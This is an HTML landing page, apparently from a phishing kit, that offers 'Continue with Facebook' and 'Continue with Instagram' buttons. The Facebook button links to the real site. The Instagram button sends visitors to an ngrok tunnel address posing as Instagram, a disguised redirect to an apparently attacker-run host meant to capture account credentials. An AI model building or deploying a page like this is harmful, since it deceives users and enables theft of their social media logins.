<!DOCTYPE html>
<html lang="tr">
<head>
			<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@700&family=Texturina:ital,wght@1,800&display=swap" rel="stylesheet">
			<title>Seçim edin</title>
			<style>
						*{margin :0;}
	#cvr{
				position : absolute ;
				background-image : url("fon.jpg");
				background-repeat: no-repeat;
		   background-size : 130%,100%;
				width :100%;
				height :100%;
				opacity :100%;
		  	
					}
						
	button{
				
				position :absolute ;
				height : 17%;
				text-align:center ; 
				left: 10%;
				border-radius : 30%;
				color :#ffffff;
				outline:0;
				border : 4px solid black ;
				padding :5px ;
	}
	#bir{
	top :30%;
	width :80%;
	font-family: 'Roboto Mono', monospace;
 font-size : 50px;
 background: rgb(255,255,255);
background: linear-gradient(90deg, rgba(255,255,255,1) 21%, rgba(1,1,1,1) 25%, rgba(0,128,255,1) 26%, rgba(3,130,255,1) 96%);
	}
	#iki{
	top:50%;
	width :80%;
	font-family: 'Texturina', serif;
	font-size : 50px;
	background: rgb(255,255,255);
background: linear-gradient(90deg, rgba(255,255,255,1) 21%, rgba(1,1,1,1) 25%, rgba(230,44,156,1) 26%, rgba(232,0,245,1) 96%);
	}
	#birs{
				position : relative;
				height :50%;
				left: -38%;
				width :20%;}
	#ikis{
				position : relative;
				height :60%;
				left: -38%;
				width :20%;}
				
				
p{
			position :absolute ;
			top :30%;
			left: 25%;}
			</style>
</head>
<body>
			<div id="cvr"></div>
			<div>
					
					
			<button id="bir" onclick="window.location.href='https://www.facebook.com';">
						<img id="birs" src="fb.png" alt="Facebook ilə davam edin..."><p>Facebook ilə davam edin...</p>
			</button>

					<button id="iki" onclick="window.location.href=`https://460d2c06e4f4.ngrok.io`;">
						<img id="ikis" src="ins.png" alt="Instagram ilə davam edin..."><p>Instagram ilə davam edin...</p>
			</button></div>
</body>
</html>
